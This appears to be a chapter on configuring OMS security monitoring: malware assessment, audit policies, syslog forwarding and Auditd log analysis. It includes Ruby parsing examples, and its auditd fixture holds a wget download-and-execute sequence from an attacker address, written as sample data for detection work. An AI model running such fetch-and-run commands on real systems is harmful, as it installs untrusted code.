Operations Management Suite (OMS): Security & Compliance

Introduction

Security has become an even more important topic in the last decade, due in part to several public security breaches at well-known companies. These breaches increase every year, not only in number but in size, and the threat actors behind them have grown more sophisticated (skilled, funded, and organized) over time. To prevent, detect, and intercept such breaches in time, we need to incorporate new tools and methods. Operations Management Suite (OMS) has a security offering that consists of a couple of solutions and also integrates with a few other solutions that are part of the Insights & Analytics offering.

In this chapter, we will go through the Antimalware Assessment and Security and Audit solutions. Additionally, we will see how we can leverage Log Analytics for auditing PowerShell and Windows Firewall port rules. By learning how to use these OMS solutions, you will be able to improve your organization's security posture.

Malware Assessment

The Malware Assessment solution identifies which servers in your environment are infected with malware or at risk of infection. To provide malware status, the machines that are added to OMS must have one of the following agents installed:

  • Windows Defender on Windows 8, Windows 8.1, Windows 10, and Windows Server 2016 or later
  • System Center Endpoint Protection (v4.5.216 or later)
  • Azure virtual machines with the antimalware extension
  • Windows Malicious Software Removal Tool (MSRT)
  • Symantec Endpoint Protection 12.x and 14.x versions
  • Trend Micro Deep Security version 9.6

The Microsoft Monitoring Agent (MMA) reads antimalware protection status and detected threats on servers with those agents, and then sends the data to Log Analytics for processing. From Log Analytics, the data can be queried to show protection and threat status for the monitored systems.

Note: Windows Management Framework (WMF) 3.0 or later is required on the servers where any of the listed agents are installed.

Follow these steps to add the Antimalware Assessment solution.

  1. Browse to OMS portal at https://www.mms.microsoft.com.
  2. In OMS Portal, click on Solutions Gallery.
  3. Click on the Antimalware Assessment solution.
  4. On the Antimalware Assessment page, click Add, as shown in Figure 1.

FIGURE 1. ANTIMALWARE ASSESSMENT SOLUTION

  5. Malware Assessment will appear as a tile on the Overview page.

Note: The Antimalware Assessment solution can be deployed via the Azure Marketplace as well.

One of the prerequisites for using the Antimalware Assessment solution is to have a machine connected to OMS that has a supported agent installed. Follow these steps to install the antimalware extension on an Azure VM.

  1. Browse to the Azure Portal, https://portal.azure.com
  2. In the Azure Portal, click Virtual Machines (classic) or Virtual Machines, depending on whether your Azure VM is version 1 or version 2.
  3. Click on the VM to which you will add Microsoft antimalware extension.

Note: The VM must also be connected to OMS with Microsoft Monitoring Agent or through System Center Operations Manager.

  4. From Settings, click on Extensions.
  5. From the Extensions blade, click on Add, as shown in Figure 2.

FIGURE 2. EXTENSIONS BLADE

Note: If your Azure VM runs Windows Server 2016, there is no need to install the Microsoft Antimalware extension, as Windows Defender is part of the OS.

  6. In the New resource blade, choose Microsoft antimalware.
  7. On the Microsoft antimalware blade, click on Create.
  8. In the Install Extension blade, input the following settings and click OK.

    Excluded Files and Locations:

    Excluded File Extensions:

    Excluded Processes:

    Real-Time Protection: Enabled

    Run A Scheduled Scan: Enabled

    Scan Type: Full

    Scan Day: Saturday

    Scan Time: 120

  9. Verify that the extension is listed after the task has executed successfully, as shown in Figure 3.

FIGURE 3. MICROSOFT ANTIMALWARE EXTENSION

Once you add the Antimalware Assessment solution, you will start to see malware-related data in OMS whether or not you have machines with supported antimalware agents. Machines that do not have a supported antimalware agent will be reported with the status "No Real Time Protection".

Follow these steps to search Antimalware Assessment data.

  • Browse to OMS portal at https://www.mms.microsoft.com.
  • On the Overview page, click on the Antimalware Assessment tile, as shown in Figure 4.

FIGURE 4. ANTIMALWARE OVERVIEW TILE

  • The Antimalware Assessment page will be opened, as shown in Figure 5.

Depending on your environment you may see different results.

  • Date/time range. Data shown on this page is scoped to the last 1 day. The scope can be changed from the top menu. Clicking on a result or chart will take you to Search with the query behind that data.
  • Threat status. The Threats status dashboard will show computers that have active or remediated threats. The Detected threats dashboard visualizes the types of threats that are present in your environment.
  • Protection status. The Protection status dashboard will show the number of computers with different protection status. The Type of protection dashboard will list the malware agents present on your computers.

FIGURE 5. ANTIMALWARE ASSESSMENT DASHBOARDS

  • Click on Overview and then Log Search.
  • In the Search bar, type the query below and press Enter.

    Type=ProtectionStatus

  • The query will show all data for Antimalware Assessment solution in the last 1 day, as shown in Figure 6.
    • Fields like ThreatStatusRank and ProtectionStatusRank show the malware status of the machine in numbers.
    • These fields have corresponding fields ThreatStatus and ProtectionStatus that show the status of the machines in readable text.
    • The TypeofProtection field designates what anti-malware agent is installed.

FIGURE 6. MALWARE ASSESSMENT DATA

  • In the Search bar, type the query below and press Enter.

    Type:ProtectionStatus TimeGenerated>NOW-2HOUR | measure max(ProtectionStatusRank) as Rank by DeviceName | where Rank>=270

  • The query will find the machines that have reported no anti-malware protection in the last 2 hours, as shown in Figure 7.

FIGURE 7. MACHINES WITH NO ANTI-MALWARE PROTECTION

  • Log on via Remote Desktop to the machine where you've installed the Azure VM Microsoft antimalware extension, the System Center Endpoint Protection (SCEP) agent, or Windows Defender.
  • Create an empty txt file and open it with Notepad.
  • Browse http://www.eicar.org/86-0-Intended-use.html and copy the sample text from the web page to the text file opened in Notepad, as shown in Figure 8.

Note: The copied text from http://www.eicar.org/86-0-Intended-use.html is not real malware. It serves as a test. Complete description is provided on the web page.

FIGURE 8. ANTI-MALWARE TESTFILE

  • Save the text file. The SCEP agent will detect the file as a malware threat and remove it.
  • Browse to the OMS site at https://www.mms.microsoft.com.
  • Click on Antimalware Assessment tile.
  • The Malware threat will be listed, as shown in Figure 9.

Note: Antimalware Assessment data is gathered on an hourly interval.

FIGURE 9. MALWARE THREAT

  • Click on the computer name with the threat.
  • Log search will be opened with a query giving more detailed results for the threat, as shown in Figure 10.

FIGURE 10. MALWARE THREAT DETAILS

  • Clicking View after the value of the Threat field will open a web page with detailed information about that malware.

Note: Currently, threat detection does not work for Symantec Endpoint Protection and Trend Micro Deep Security agents.

Security and Audit

Security and Audit is a solution that provides forensic analysis, investigation of security breach patterns, threat detection, and auditing capabilities. Data for Security and Audit is ingested from various sources, depending on the type of node. For Windows machines, security data is collected from the Security event log, the Windows Firewall log, and the AppLocker event log. For Linux machines, security data is collected from syslog. As soon as data is generated in those logs, it is sent to the OMS service. Additionally, security baseline scans are performed every day for Windows machines. The solution is partially functional just by adding it to your OMS workspace, but some additional configuration is required for full functionality.

One such functionality is a feature named Malicious IP. The Windows Firewall logs record information about communication with public IP addresses. On an hourly basis, OMS connects to the Microsoft Threat Intelligence Center (MSTIC) and gets the latest information on public IP addresses that are related to suspicious activities. The MSTIC team works with various threat intelligence partners to gather and provide this consolidated list to the OMS service. OMS matches the data from MSTIC against the public IPs your servers are communicating with, and the joined data is exposed in OMS and can be searched. For those malicious IPs, information like Threat type and Threat Description is available in the returned fields. Other solutions, like Wire Data 2.0 and IIS logs, also gather network communication data; when those solutions are added, they increase the reach of this intelligence by providing more information.

Note: The Security event log generates high-velocity data, which requires it to be sent to the OMS service immediately. When SCOM is used as the data source, the data is not forwarded to the SCOM Management Server and uploaded to OMS from there; it is sent directly from the Microsoft Monitoring Agent to the OMS service. This behavior prevents performance issues on the SCOM Management Server.

Follow these steps to add the Security and Audit solution.

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. In OMS Portal click on Solutions Gallery.
  3. Click on Security and Audit solution.
  4. On Security and Audit page click Add, as shown in Figure 11.

FIGURE 11. SECURITY AND AUDIT SOLUTION PAGE

Note: You can add the Security and Audit solution from the Azure Marketplace as well. If you deploy Security & Compliance from either the Azure or the OMS portal, the solution will be deployed along with it.

  5. Security and Audit will appear as a tile on the Overview page. It can take a couple of minutes until the tile displays some information.
  6. From the Overview page, click on the Security and Audit tile.
  7. The first time you open the solution dashboards, you will be asked to enable a few default alerts, as shown in Figure 12.

FIGURE 12. SECURITY AND AUDIT SOLUTION DEFAULT ALERTS

  8. Click Enable Alerts. You can modify, disable, or delete those alerts later on the Alerts page under Settings.

Settings, Configurations, and Integrations

Security and Audit Solution Settings

The Security and Audit solution offers centralized settings for which Windows events will be collected. Execute the steps below to configure the Security and Audit solution settings:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. In Overview page click on Settings.
  3. From Solutions tab click on Security and Audit, as shown in Figure 13.

FIGURE 13. SETTINGS PAGE – SOLUTIONS

  4. Click on Settings inside the Security and Audit solution, as shown in Figure 14.

FIGURE 14. SECURITY AND AUDIT SOLUTION

  5. Click on Common and Save, as shown in Figure 15.

FIGURE 15. SECURITY AND AUDIT SETTINGS

  6. Return to the Security and Audit Settings.
  7. Select All Events and click Save.

Table 1 provides information for all available options in Security and Audit settings.

Setting: All events
Description: OMS will collect all Windows Security and AppLocker event logs. For customers who want to make sure all events are collected.
Windows Security Event IDs: all
AppLocker event IDs: all

Setting: Common
Description: OMS will collect a standard set of events to enable common security and audit tasks. This is a set of events that will satisfy most customers and allow them a full audit trail.
Windows Security Event IDs: 1102, 4626, 4625, 4657, 4663, 4688, 4700, 4702, 4719, 4720, 4722, 4723, 4724, 4727, 4728, 4732, 4735, 4737, 4739, 4740, 4754, 4755, 4756, 4767, 4825, 4946, 4948, 4956, 5024, 5033, 299, 300, 324, 340, 403, 404, 410, 411, 412, 413, 431, 500, 501, 1100, 1107, 1108, 4608, 4610, 4611, 4614, 4616, 4622, 4634, 4647, 4648, 4649, 4658, 4661, 4662, 4665, 4666, 4667, 4670, 4673, 4674, 4675, 4689, 4690, 4697, 4704, 4705, 4716, 4717, 4718, 4725, 4726, 4729, 4733, 4738, 4742, 4744, 4745, 4746, 4750, 4751, 4752, 4757, 4760, 4761, 4762, 4764, 4768, 4771, 4774, 4778, 4779, 4781, 4793, 4797, 4798, 4799, 4800, 4801, 4802, 4803, 4826, 4870, 4886, 4887, 4888, 4893, 4898, 4902, 4904, 4905, 4907, 4931, 4932, 4933, 4985, 5059, 5136, 5137, 5140, 5145, 5632, 6144, 6145, 6272, 6273, 6278, 8222, 26401, 30004
AppLocker event IDs: 8001, 8002

Setting: Minimal
Description: OMS will collect the minimal set of events that are required for threat detection. By enabling this option, you won't be able to have a full audit trail. A smaller set of events for customers who want to minimize the event volume.
Windows Security Event IDs: 1102, 4626, 4625, 4657, 4663, 4688, 4700, 4702, 4719, 4720, 4722, 4723, 4724, 4727, 4728, 4732, 4735, 4737, 4739, 4740, 4754, 4755, 4756, 4767, 4825, 4946, 4948, 4956, 5024, 5033
AppLocker event IDs: 8001, 8002

Setting: None
Description: No Security or AppLocker events will be collected. The Security and Audit solution will only present data based on agent assessment, such as Antimalware, Security Baseline, and Update. For customers who choose this option, their security dashboards will have only Windows Firewall logs and proactive assessments like antimalware, baseline, and update.
Windows Security Event IDs: None
AppLocker event IDs: None

TABLE 1. SECURITY SETTINGS

Configure Audit Policies on Windows Servers

If you have configured OMS to gather All events in the Security and Audit settings, you will still need to configure what kinds of audit events are logged on your Windows servers. This is configured through Windows audit policies. More security events can be enabled or disabled through these policies, thus providing more or less data in OMS and visibility into your environment. The steps below walk through configuring audit policies in domain group policies, but the same steps can be executed with local group policies as well.

Follow these steps to configure advanced audit policies.

  1. Log in to an Active Directory domain controller in your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Advanced Audit Policy Configuration, Audit Policies, as shown in Figure 16.

FIGURE 16. ADVANCED AUDIT POLICIES

  6. Under the Audit Policies tree, there are 10 categories of audit policies, each containing a few policies. Each policy can be configured for success and/or failure events.
  7. Enable the policies according to the recommendations provided by Microsoft at https://technet.microsoft.com/en-us/library/dn487457.aspx or according to your organization's requirements.
  8. Close the Group Policy Management Editor.
  9. The same steps can be executed for the Default Domain Controller Policy to customize audit policies for the Active Directory domain controllers in your environment.

Configure AppLocker Audit Policies

AppLocker audit events need to be configured to provide you with information about what executables, installers, scripts, and packages are used in your environment. That data can be used to find executables that are running in your environment.

Follow these steps to configure AppLocker policies for Audit Only.

  1. Log on to an Active Directory domain controller in your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Application Control Policies, AppLocker, as shown in Figure 17.

FIGURE 17. APPLOCKER POLICIES

  6. Right-click on AppLocker and select Properties.
  7. Enable the Audit Only policy on all rules, as shown in Figure 18, and click OK.

FIGURE 18. APPLOCKER PROPERTIES

  8. Right-click on Executable Rules and select Create Rule. The Create Executable Rules Wizard starts.
  9. On the Before You Begin page, click Next.
  10. On the Permissions page, select Allow for Action and Everyone for Group. Click Next.
  11. On the Conditions page, select Path and click Next.
  12. On the Path page, enter *, as shown in Figure 19, and click Next.

FIGURE 19. CREATE EXECUTABLE RULES WIZARD

  13. On the Exceptions page, click Next.
  14. On the Name page, enter "Allow all files" for Name and click Create.
  15. Repeat steps 8 to 15 for the other three categories: Windows Installer Rules, Script Rules, and Packaged App Rules.
  16. Expand Computer Configuration, Windows Settings, Security Settings.
  17. Select System Services.
  18. In the details pane, double-click on Application Identity.
  19. In Application Identity Properties, configure the service to start automatically.
  20. Repeat steps 4 to 20 for the Default Domain Controller Policy.
  21. Close the Group Policy Management Editor.
  22. Wait until the policies are applied or force a group policy update. You can force a group policy update from the command line by typing gpupdate /force.

Configure Windows Firewall Log Policies

Like the AppLocker policies, Windows Firewall log policies are not configured by default. You will need to configure them in order for the OMS agent to collect the logs into Log Analytics through the Security and Audit solution.

Follow these steps to configure Windows Firewall Log Policies.

  1. Log on to an Active Directory domain controller in your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Windows Firewall with Advanced Security, as shown in Figure 20.

FIGURE 20. WINDOWS FIREWALL WITH ADVANCED SECURITY POLICIES

  6. Right-click on Windows Firewall with Advanced Security and select Properties.
  7. On the Domain Profile tab, in the Logging section, click Customize.
  8. Enter the settings shown in Figure 21 and click OK.

FIGURE 21. LOGGING SETTINGS FOR WINDOWS FIREWALL PROFILES

  9. Repeat steps 7 to 8 for the Private Profile and the Public Profile.
  10. Repeat steps 4 to 9 for the Default Domain Controller Policy.
  11. Close the Group Policy Management Editor.

Configure Microsoft Advanced Threat Analytics Integration

Advanced Threat Analytics (ATA) is an on-premises platform that helps protect your enterprise from multiple types of advanced targeted cyber-attacks and insider threats. It uses information from multiple data sources in your network to learn the behavior of users and other entities in the organization and build a behavioral profile of them, and it leverages ATA's proprietary network parsing engine to capture and parse network traffic of multiple protocols. Microsoft ATA's functionality is similar to the Threat Detection feature in the Security and Audit solution. ATA logs any suspicious activities, and once the integration with Log Analytics is set up, the information for those activities appears in the SecurityDetection type along with the threat detections from the Security and Audit solution.

Execute the following steps to set up the integration with Microsoft ATA:

  1. Make sure that you have Microsoft Monitoring Agent installed on your Microsoft ATA server and connected to Log Analytics Workspace.
  2. Make sure that Security and Audit solution is enabled for that same Log Analytics Workspace.
  3. Log on to the Microsoft ATA server and start the Microsoft ATA Console.
  4. Navigate to Configuration -> Notifications -> Syslog server, as shown in Figure 22.

FIGURE 22. MICROSOFT ATA CONSOLE

  5. Enter the following configuration, as shown in Figure 23, and click Save.

Syslog server endpoint: 127.0.0.7:5114

Transport: UDP

Format: RFC5424

FIGURE 23. SYSLOG SERVER CONFIGURATION

  6. In Notifications, click on Settings.
  7. Enable all Syslog notifications, as shown in Figure 24.

FIGURE 24. SYSLOG NOTIFICATIONS

  8. Restart the Microsoft Monitoring Agent service on the ATA server.
  9. When a new suspicious activity is registered by the ATA server, it will appear in Log Analytics as well, as shown in Figures 25 and 26.

FIGURE 25. MICROSOFT ATA SUSPICIOUS ACTIVITY

FIGURE 26. MICROSOFT ATA SUSPICIOUS ACTIVITY IN OMS

Note: You may see the same activities logged twice but with a different Provider field value. Initially, a basic integration was provided between OMS Log Analytics and Microsoft ATA. That basic integration is still active, but it will be deprecated in the future. Events from the old integration are logged with the Provider field value Microsoft ATA, whereas the new integration uses the value Advanced Threat Analytics.

Configure Common Event Format (CEF) Logs Integration

The Security and Audit solution can be integrated with 3rd-party devices and systems that generate Common Event Format (CEF) logs. In such a scenario, the 3rd-party system sends syslog events to a Linux-based machine that is connected to your OMS Log Analytics workspace. The Linux-based machine receives the syslog events and forwards them to the workspace. Basically, the Linux machine acts as a forwarder.

Execute the steps below to ingest logs from a Cisco ASA device into Log Analytics:

  1. Log in via SSH to an OMS-supported Linux machine that will be the forwarder. In our case, we are using Ubuntu 14.04 LTS.
  2. The Linux machine should have the OMS agent installed and connected to your workspace.
  3. The Security and Audit solution should be enabled for that same workspace.
  4. Open the omsagent.conf file in an editor. The command below uses the vi editor to edit the file.

    sudo vi /etc/opt/microsoft/omsagent/conf/omsagent.conf

  5. Locate the following settings and change them, as shown in Figure 27.

    num_threads 10
    buffer_queue_limit 30
    max_retry_wait 300s
    retry_wait 2s

FIGURE 27. OMSAGENT.CONF FILE

  6. By default, the OMS Agent for Linux can handle a throughput of 500 messages/second. This configuration increases it to 2000 messages/second. Press the ESC key and enter :wq to save the file.
  7. Navigate to the omsagent.d folder with the command below. Replace <workspace id> with your own value.

    cd /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.d/

  8. In the omsagent.d folder, create a file named security_events.conf.

    sudo vi security_events.conf

  9. Enter the following content in it, as shown in Figure 28.

    <source>
      type syslog
      port 25225
      bind 0.0.0.0
      protocol_type udp
      tag oms.security
      format /^(?<time>(?:\w+ ){2,3}(?:\d+:){2}\d+):? ?(?:(?<host>[^: ]+) ?:?)? (?<ident>[a-zA-Z0-9_%\/\.\-]*)(?:\[(?<pid>[0-9]+)\])?: *(?<message>.*)$/
    </source>

    <filter oms.security.**>
      type filter_syslog_security
    </filter>

FIGURE 28. SECURITY_EVENTS.CONF FILE

  10. This tells the OMS agent to listen on the specified port for the syslog events being sent, format them appropriately, and forward them to the Log Analytics workspace. Press the ESC key and enter :wq to save the configuration.

Note: In this example, we've modified security_events.conf to differ from the proposed one located at https://github.com/Microsoft/OMS-Agent-for-Linux/blob/master/installer/conf/omsagent.d/security_events.conf . In the example from the OMS Agent for Linux repository, the syslog events are first sent to the rsyslog or syslog-ng service and then forwarded to the OMS agent. In our example, we are using the solution proposed by Daniele Grandini (https://nocentdocent.wordpress.com/2016/09/14/msoms-collecting-cisco-asa-events-the-right-way/ ), where syslog events are sent directly to the OMS agent.

  11. Restart the OMS agent.

    sudo /opt/microsoft/omsagent/bin/service_control restart

  12. Log on to your 3rd-party device.
  13. Enable logging on your device if it is not enabled, as shown in Figure 29.

FIGURE 29. ENABLE LOGGING

  14. Add the Linux machine as a syslog server. The IP Address is the IP of the Linux machine, the protocol is UDP, and the port is 25225, as shown in Figure 30.

FIGURE 30. ADD SYSLOG SERVER

  15. Configure the severity level that will be sent to the syslog servers, as shown in Figure 31.

FIGURE 31. ADD SYSLOG SERVER SEVERITY CONFIGURATION

  16. Configure the device to include the timestamp and hostname in the syslog events, as shown in Figure 32.

FIGURE 32. CONFIGURE TIMESTAMP AND HOSTNAME

  17. Apply all configurations and save them.
  18. On the Linux machine, you can check the OMS agent for errors with the following command. Replace <workspace id> with your own.

    tail /var/opt/microsoft/omsagent/<workspace id>/log/omsagent.log

  19. After several minutes, the syslog events from the 3rd-party device will appear in Log Analytics under the CommonSecurityLog type, as shown in Figure 33.

FIGURE 33. COMMONSECURITYLOG TYPE

Some steps in this scenario are specific to the Cisco ASA device, but most are generic and can be used to forward events from any 3rd-party device that supports the CEF format.

Note: The full documentation on this scenario is available at https://github.com/Microsoft/OMS-Agent-for-Linux/blob/master/docs/Security-Events-Preview-Configuration.md .
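Because fluentd compiles the format string in security_events.conf with Ruby's regex engine, the cheapest way to check that regex before pointing a device at the forwarder is to run it under Ruby. The block below is an added example, not part of the page or of the OMS Agent for Linux repository: it applies the exact regex from Figure 28 to constructed syslog lines (an ASA message with timestamp and hostname enabled as in Figure 32, one without the hostname, and an ordinary sshd line) and shows what lands in time, host, ident, pid and message. The asa_severity helper, the unparsed_lines check and the sample lines are assumptions of the example.

```ruby
# The exact `format` regex from security_events.conf (Figure 28); fluentd hands this
# string to Ruby's regex engine, so the same literal can be exercised here.
SYSLOG_FORMAT = /^(?<time>(?:\w+ ){2,3}(?:\d+:){2}\d+):? ?(?:(?<host>[^: ]+) ?:?)? (?<ident>[a-zA-Z0-9_%\/\.\-]*)(?:\[(?<pid>[0-9]+)\])?: *(?<message>.*)$/

# Constructed sample lines (documentation address ranges, not real devices):
# an ASA line with timestamp and hostname enabled, one without the hostname,
# and an ordinary sshd line to show the pid capture.
SAMPLE_LINES = [
  'May 10 10:15:01 asa-edge : %ASA-6-302013: Built outbound TCP connection 12345 for outside:203.0.113.77/443 (203.0.113.77/443) to inside:10.0.0.5/49823 (10.0.0.5/49823)',
  'May 10 10:15:02 %ASA-4-106023: Deny tcp src outside:198.51.100.23/51000 dst inside:10.0.0.5/3389 by access-group "outside_in"',
  'May 10 10:15:03 ubuntu-fwd sshd[2201]: Failed password for invalid user admin from 198.51.100.23 port 40022 ssh2'
].freeze

# Returns the named captures as a Hash, or nil when fluentd would reject the line.
def parse_syslog_line(line)
  m = SYSLOG_FORMAT.match(line)
  return nil unless m
  { time: m[:time], host: m[:host], ident: m[:ident], pid: m[:pid], message: m[:message] }
end

def parse_all(lines = SAMPLE_LINES)
  lines.map { |line| parse_syslog_line(line) }
end

# Helper (an assumption of this example): split an ASA ident such as %ASA-4-106023
# into the syslog severity (0-7) and the message id used in Cisco's documentation.
def asa_severity(ident)
  m = /\A%ASA-(?<sev>\d)-(?<id>\d+)\z/.match(ident.to_s)
  m && { severity: m[:sev].to_i, message_id: m[:id] }
end

# Lines the regex rejects never reach CommonSecurityLog, so list them before deploying.
def unparsed_lines(lines = SAMPLE_LINES)
  lines.reject { |line| SYSLOG_FORMAT.match?(line) }
end

if __FILE__ == $PROGRAM_NAME
  parse_all.each { |row| puts row.inspect }
  puts "unparsed: #{unparsed_lines.size}"
end
```

Note that the second line parses with host left empty: when the device sends no hostname, the regex assigns the ASA message id to ident rather than to host.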

Linux Auditd Integration

In Windows, we have the Windows Security event log to collect security events and audit Windows-based systems. Linux has a similar capability called the Linux Auditing System, also known as Auditd. Auditd allows you to create an audit trail, which is basically a log of every action on the server. Security-relevant events can be recorded via Auditd and then analyzed for malicious or unauthorized activities. The OMS team is currently working on Auditd integration for the Security and Audit solution, and in this section we will get a glimpse of what that integration looks like.

In the steps below, we go through a scenario where a Linux machine is configured with Auditd and its logs are ingested into Log Analytics. On that Linux machine, a successful brute-force attack is carried out, and some executables are downloaded and then executed to perform malicious actions.

  1. In Figure 34 we see login attempts to two different Linux machines.

FIGURE 34. LOGIN ATTEMPTS ON LINUX MACHINES LOG

  2. In Figure 35, we investigate one of the login attempts that is successful, and we can see all the information that comes in such a record. The record states that it was an SSH login from a specific IP and that it was successful.

FIGURE 35. SUCCESSFUL LOGIN ATTEMPT ON LINUX MACHINE

  3. In Figure 36, we see that an audit EXECVE record type is created for the wget process.

FIGURE 36. WGET EXECUTED RECORD

  4. A record of this type is generated with every process creation, and there are a total of 6 records generated for this type of event. Figure 37 shows all 6 records; notice that they share the same audit id.

FIGURE 37. PROCESS CREATION RECORDS

  5. With the query in Figure 38, we get all the processes that are being executed on the machine. That way, we can track what kind of malicious software was executed on the attacked machine.

FIGURE 38. ALL EXECUTED PROCESSES

The simple scenario above illustrates the kind of audit data that is being collected by Log Analytics. We can easily imagine how, in the near future, this data can be used for further integration with the Security and Audit solution, where we can be notified about threat detections and notable security issues appearing in our Linux environments.

Note: Auditd integration is currently in private preview.
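The scenario above (the login attempts, the EXECVE record, the six records that share one audit id, and the query for all executed processes) can be reproduced offline from the raw audit log. The block below is an added Ruby example, not part of the page or of the OMS Auditd integration: it parses a constructed auditd excerpt, groups records by audit event id, rebuilds each executed command line from the EXECVE arguments together with the SYSCALL record's auid and exe, and lists the SSH login attempts with their result. The log lines, addresses and file names are constructed for the example.

```ruby
# Constructed auditd excerpt (not the page's figures): a failed and a successful SSH
# login from one address, then two execve events; event 4201 carries the six records
# auditd emits for a single process start (SYSCALL, EXECVE, CWD, PATH x2, PROCTITLE).
AUDIT_LOG = <<~LOG
  type=USER_AUTH msg=audit(1494411290.001:4198): pid=2201 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="admin" exe="/usr/sbin/sshd" hostname=198.51.100.23 addr=198.51.100.23 terminal=ssh res=failed'
  type=USER_LOGIN msg=audit(1494411295.500:4200): pid=2201 uid=0 auid=1000 ses=5 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=198.51.100.23 addr=198.51.100.23 terminal=/dev/pts/0 res=success'
  type=SYSCALL msg=audit(1494411301.123:4201): arch=c000003e syscall=59 success=yes exit=0 ppid=2210 pid=2215 auid=1000 uid=1000 gid=1000 euid=1000 comm="wget" exe="/usr/bin/wget" key="exec"
  type=EXECVE msg=audit(1494411301.123:4201): argc=3 a0="wget" a1="-q" a2="http://198.51.100.23/sample.sh"
  type=CWD msg=audit(1494411301.123:4201):  cwd="/tmp"
  type=PATH msg=audit(1494411301.123:4201): item=0 name="/usr/bin/wget" inode=131 mode=0100755 ouid=0 ogid=0
  type=PATH msg=audit(1494411301.123:4201): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=77 mode=0100755 ouid=0 ogid=0
  type=PROCTITLE msg=audit(1494411301.123:4201): proctitle=776765742D71
  type=SYSCALL msg=audit(1494411305.777:4205): arch=c000003e syscall=59 success=yes exit=0 ppid=2210 pid=2230 auid=1000 uid=1000 comm="sh" exe="/bin/dash" key="exec"
  type=EXECVE msg=audit(1494411305.777:4205): argc=2 a0="sh" a1="sample.sh"
  type=CWD msg=audit(1494411305.777:4205):  cwd="/tmp"
LOG

# Record header: type, timestamp and the per-event serial that ties records together.
HEADER = /\Atype=(?<type>\w+) msg=audit\((?<ts>\d+\.\d+):(?<id>\d+)\):\s*(?<rest>.*)\z/
# key=value pairs; values may be double-quoted, single-quoted (the nested msg='...') or bare.
KV = /(\w+)=("(?:[^"\\]|\\.)*"|'[^']*'|\S+)/

def parse_fields(text)
  fields = {}
  text.scan(KV) do |key, value|
    if value.start_with?("'")
      fields.merge!(parse_fields(value[1..-2]))   # flatten the nested msg='...' block
    else
      fields[key] = value.start_with?('"') ? value[1..-2] : value
    end
  end
  fields
end

def parse_records(text)
  text.each_line.map do |line|
    m = HEADER.match(line.strip)
    next unless m
    { type: m[:type], time: Time.at(m[:ts].to_f).utc, event_id: m[:id].to_i, fields: parse_fields(m[:rest]) }
  end.compact
end

# One entry per process start: the command line rebuilt from EXECVE a0..aN plus the
# SYSCALL record's login uid and binary, mirroring the "all executed processes" query.
def executed_processes(text = AUDIT_LOG)
  parse_records(text).group_by { |r| r[:event_id] }.map do |id, recs|
    execve = recs.find { |r| r[:type] == 'EXECVE' }
    next unless execve
    syscall = recs.find { |r| r[:type] == 'SYSCALL' }
    argv = Array.new(execve[:fields]['argc'].to_i) { |i| execve[:fields]["a#{i}"] }
    {
      event_id: id,
      time: execve[:time],
      record_count: recs.size,
      auid: syscall && syscall[:fields]['auid'],
      exe: syscall && syscall[:fields]['exe'],
      cwd: recs.find { |r| r[:type] == 'CWD' }&.dig(:fields, 'cwd'),
      cmdline: argv.join(' ')
    }
  end.compact
end

# SSH authentication outcomes, the data behind the login-attempt figures.
def login_attempts(text = AUDIT_LOG)
  parse_records(text).select { |r| %w[USER_AUTH USER_LOGIN].include?(r[:type]) }.map do |r|
    f = r[:fields]
    { type: r[:type], account: f['acct'] || f['id'], addr: f['addr'], result: f['res'] }
  end
end

if __FILE__ == $PROGRAM_NAME
  login_attempts.each { |l| puts "#{l[:type]} #{l[:account]} from #{l[:addr]}: #{l[:result]}" }
  executed_processes.each { |p| puts "#{p[:time]} auid=#{p[:auid]} #{p[:exe]} -> #{p[:cmdline]} (#{p[:record_count]} records)" }
end
```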

Configure Additional Solutions and Data Sources

To take full advantage of the Security and Audit solution, the following data sources or solutions need to be configured as well:

  • Enable Update Management Solution
  • Enable and configure Wire Data 2.0 solution
  • Enable Antimalware Assessment solution
  • Collect IIS logs
  • Enable DDI Analytics Solution

Dashboards

As we walk through the dashboards in the Security and Audit solution in the next sections, we will explain which ones visualize data from which sources.

Execute the steps below to navigate to Security and Audit solution dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile, as shown in Figure 39.

FIGURE 39. SECURITY AND AUDIT TILE

  3. A page with multiple dashboards will open, as shown in Figure 40.

FIGURE 40. SECURITY AND AUDIT DASHBOARDS

The dashboards are divided into four groups: Security Domains, Notable Issues, Detections, and Threat Intelligence.

Security Domains

In the Security Domains group, there are 8 tiles and one dashboard. The dashboard shows the number of security events over time; it counts all records present in the SecurityEvent type, which is where Windows security events are registered. You can click on the dashboard to visualize the data in a bigger chart.

1 Antimalware Assessment

When you click on the Antimalware Assessment tile, it will lead you to the same dashboards available from the Antimalware solution we covered earlier in this chapter. The benefit of this shortcut is that you have all your security data in a centralized dashboard.

2 Update Assessment

The Update Assessment tile leads to the dashboards for Update Management solution.

This solution was covered in "Chapter 5: Change and Update Management".

3 Network Security

The Network Security Tile leads to dashboards showing network data from different sources in the context of security. The Wire Data 2.0 solution feeds most of the dashboards in this view. Wire Data 2.0 stores its data as type WireData. Additionally, data from types W3CIISLog (IIS log ingestion), WindowsFirewall (Windows Firewall log ingestion), CommonSecurityLog (Common Event Format and Cisco ASA log ingestion) and DnsEvents (DDI Analytics solution) are also used for data related to Malicious IP communication.

Execute the steps below to explore Network Security dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Network Security tile.
  4. Another set of dashboards will load, as shown in Figure 41.

FIGURE 41. NETWORK SECURITY DASHBOARDS

  5. The dashboards are divided into 4 groups:
    1. Network Security Context. General network data like inbound and outbound communications in your environment. The blue arrows indicate trends compared to the previous day. You can click on each tile of this group, which will lead you to the query behind those numbers and visualizations.
